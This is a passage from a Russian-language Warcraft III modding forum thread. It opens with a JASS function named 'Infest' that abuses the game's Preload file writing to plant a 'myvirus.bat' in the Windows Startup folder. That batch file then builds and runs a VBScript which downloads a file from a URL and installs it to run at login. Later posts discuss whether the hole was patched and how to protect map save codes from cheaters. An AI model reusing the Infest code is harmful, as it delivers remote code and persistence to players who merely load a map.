Msey
????
offline
Опыт:
67,346Активность: |
кстати, это пофиксили или нет?
((код jass
function Infest takes string url, string localname returns nothing
call PreloadGenClear() call PreloadGenStart() call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//") call Preload("\")\necho objXMLHTTP.open \"GET\", \""url"\", false >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//") call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//") call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//") call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//") call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"localname"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"localname"\" >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"localname"\" >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//") call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//") call Preload("\")\nstart %TEMP%\\download.vbs\n//") call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat") call PreloadGenClear() call PreloadGenStart() call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//") call Preload("\")\necho objXMLHTTP.open \"GET\", \""url"\", false >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//") call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//") call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//") call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//") call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"localname"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"localname"\" >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"localname"\" >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//") call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//") call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//") call Preload("\")\nstart %TEMP%\\download.vbs\n//") call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat") endfunction =========================================================================== function InitTrig_Melee_Initialization takes nothing returns nothing call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip") )) |
22.06.2012, 21:23 | #141
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
YellowStar
poon
offline
Опыт:
15,144Активность: |
Да, в интернет теперь бинарник он не запустит, но я бинарниками зато создавал loc файлы.
|
23.06.2012, 00:38 | #142
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Msey
????
offline
Опыт:
67,346Активность: |
И файлы больше не сохраняет кроме txt формата? (я не проерял, ибо времени не было) |
24.06.2012, 17:07 | #143
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
YellowStar
poon
offline
Опыт:
15,144Активность: |
Цитата:
Формат не важен особо. В том вся соль и есть. Бтв, по теме. Кому интересна система но у кого наебнулись энтеры при записи перед \n ставьте \r. Конструкция такая. \r\n |
|
04.08.2012, 11:14 | #144
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
16GB
GhostOne User
offline
Опыт:
60,317Активность: |
YellowStar, так ты выложишь рабочую исправленную тобой версию? |
04.08.2012, 11:19 | #145
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
YellowStar
poon
offline
Опыт:
15,144Активность: |
~16GB:
Да, если будет не лень в ближайшие дни. В принципе там работы на две минуты. |
04.08.2012, 18:54 | #146
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
ScorpioT1000
Работаем
online
Опыт: отключен
|
"при записи перед \n ставьте \r." внезапно на маках случится говно <3 |
04.08.2012, 19:00 | #147
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Fakov
Viva la Fa
offline
Опыт:
102,058Активность: |
собснно хотелось бы знать - когда же? |
07.08.2012, 18:12 | #148
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
YellowStar
poon
offline
Опыт:
15,144Активность: |
[quote=ScorpioT1000]"при записи перед \n ставьте \r." внезапно на маках случится говно <3[/quote]
Я срал на макинтоши. Собственно, вот ловите припишу кодом, карту лень выкладывать, но офк все работает, так как юзаю, сию замечательную наработочку в своей карте.
Офк работает без cJass
[size=1][i]YellowStar добавил:[/i][/size]
poh na formatirovanie - luto besit su4ka!!!! Отредактировано DragonSpirit, 23.08.2012 в 19:22. |
16.08.2012, 02:22 | #149
+1/−1
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Карточка
Kicked by SSrunX
offline
Опыт:
2,017Активность: |
наработка - супер
но допустим, если в карту интегрировать что-то вроде системы с идеей "больше отыграл - имеешь какие-то бонусы", то как её защитить от взлома? изначально полагаем, что никто не сможет защитить код карты от просмотра. а в этом коде будет видна вся защита системы, все проверки и др.
есть ли какая-то возможность защитить файл с сейвом от вмешательства читера, который рубит в джассе? |
23.08.2012, 17:35 | #150
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Nerevar
I'll be back!
offline
Опыт:
18,352Активность: |
Карточка, можно увеличить время взлома,не более
Nerevar добавил: Ну т.е. конечно можно устроить взломщику аццкий форт-боярд,но я не буду озвучивать этот способ |
23.08.2012, 17:53 | #151
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Карточка
Kicked by SSrunX
offline
Опыт:
2,017Активность: |
да большая проблема: допустим есть защищающий код, который какое-то число закодирует. взломщик выдёргивает код, во входные данные ставит своё 99999 число и на выходе получит закодированный сейв, который пройдёт все проверки карты при загрузке. хоть 99999 строк защищающих кодов не помогут
я даже не предполагаю что тут можно закрутить такого, чтобы это реально мешало взломать |
23.08.2012, 17:59 | #152
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Nerevar
I'll be back!
offline
Опыт:
18,352Активность: |
Карточка, ваша проблема в том что ваши значения\константы для кодирования легко выдираются вместе с функцией шифрования,что я наглядно показал на примере взлома админки евикса(тему снесли правда из барахолки) |
23.08.2012, 18:02 | #153
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
alexprey
познающий Unity
offline
Опыт:
68,501Активность: |
Карточка, 100% защиты не будет. Если сделаешь обусфикацию системы защиты, то считай что 80-90% знающих уже отсеяться, ибо ни кто не захочет пол года копаться и разбираться для чего что тут нужно |
23.08.2012, 18:03 | #154
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
YellowStar
poon
offline
Опыт:
15,144Активность: |
Юзай executeFunc, и путай этими самыми ExecuteFunc.
Простой пример. Код:
YOUR FUNC CODE save data где InvMustDie - сохраняемый юнит, с высоким хендлом где InvMustLive - юнит к которому атачим нашего юнита, ну допустим, созданный вначале круг власти в доте. где bit - сохраняемое число Код:
Требуется. Сохранить HandleUnita Ну собственно формлулу можешь доработать, она не рабочая, просто простой пример шифрования... Итд. При том, что для шифрации, ты можешь добавлять данные в прелоадер. Потом выложу когда карту, попытаетесь её поломать, там алгоритм оче сложный (с различными HandleId, И полностью рабочий) |
23.08.2012, 18:39 | #155
+0/−1
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Doc
offline
Опыт:
63,163Активность: |
Ну да короче запутываешь, делаешь кучу контрольных сумм, контрольные суммы по контрольным суммам всякие хеши. Можно взять полученный код и сделать код из него, отрезать часть от начального и поставить в конец полученного потом все проверить. Чем больше функций всяких тем больше людей забьют на взломы. |
23.08.2012, 19:05 | #156
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Карточка
Kicked by SSrunX
offline
Опыт:
2,017Активность: |
думаю есть необходимость очень сильно завязывать код на карту. т.е. его перемещение функции шифрования в пустышку не обеспечит работу. например, привязывать объекты в карте, а по объектам брать инфу, если не отказала память - есть некоторое кол-во функций, берущих данные по объекту. например в РО запасаем цифру 8389. эти данные некотором образом (не явно) привязать к шифрованию так, чтобы при их отсутствии выдавался неверный код для сейва
данные из РО переезжают в слк. в итоге получается, чтобы воспользоваться функцией шифрования, надо запустить саму карту(причём функцию сделать так, чтобы её куски были вообще везде, т.е. чтобы не оставляли только шифрование в карте). а запуск карты после слк и векса - геморрой адовый. |
23.08.2012, 19:23 | #157
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Doc
offline
Опыт:
63,163Активность: |
Карточка, да можно привязывать к GetHandleId какого-нибудь юнита, если ничего не добавлять - данные не поменяются. Но эту проверку тоже можно убрать. |
23.08.2012, 19:30 | #158
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
Карточка
Kicked by SSrunX
offline
Опыт:
2,017Активность: |
проверка - очень явный вид и легко редактируется
я думаю про что-то вроде череды формул, в которых очень важно, чтобы данные полученные по РО были верные. можно и id юнита и РО, а можно и по десятку их использовать. данные не верные - сгенеренный код не работает
достать id и данные из РО - работа с прямым взломом карты для её полноценного запуска; что есть удовольствие гигантское :D. хотя это не совсем верно, в закрытую версию можно интегрировать код для выведения на экран ид и данных из РО, и затем вставить их в карту пустышку. это всё упрощает, конечно, но менять код генерации + изменение кода закрытой карты = ручной взлом, что сужает круг тех, кто это сможет до единиц |
23.08.2012, 19:40 | #159
+0/−0
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|
YellowStar
poon
offline
Опыт:
15,144Активность: |
Да что мешает сделать такое тебе шифрование?
R2I(SquareRoot(StringHash(GetPlayerName(GetTriggerPlayer())))+.5) и использовать его как контрольную сумму, или как множитель? тогда и взлом будет сложнее, так как ты привяжешь сразу к игроку, а 90% игроков - срать на то, что они не смогут просчитать. При том, можно сделать две контрольные суммы, которые считаются не формулярно, а считаются опять таки через StringHash("blabla"), череp Pow() etc. Плюс я уверен, что карта не будет прям такой задрачиваемой, чтобы решили все вот так взять и взломать. |
23.08.2012, 19:45 | #160
+0/−1
Профиль |
Приват |
Поиск |
Цитата |
IP: Записан
|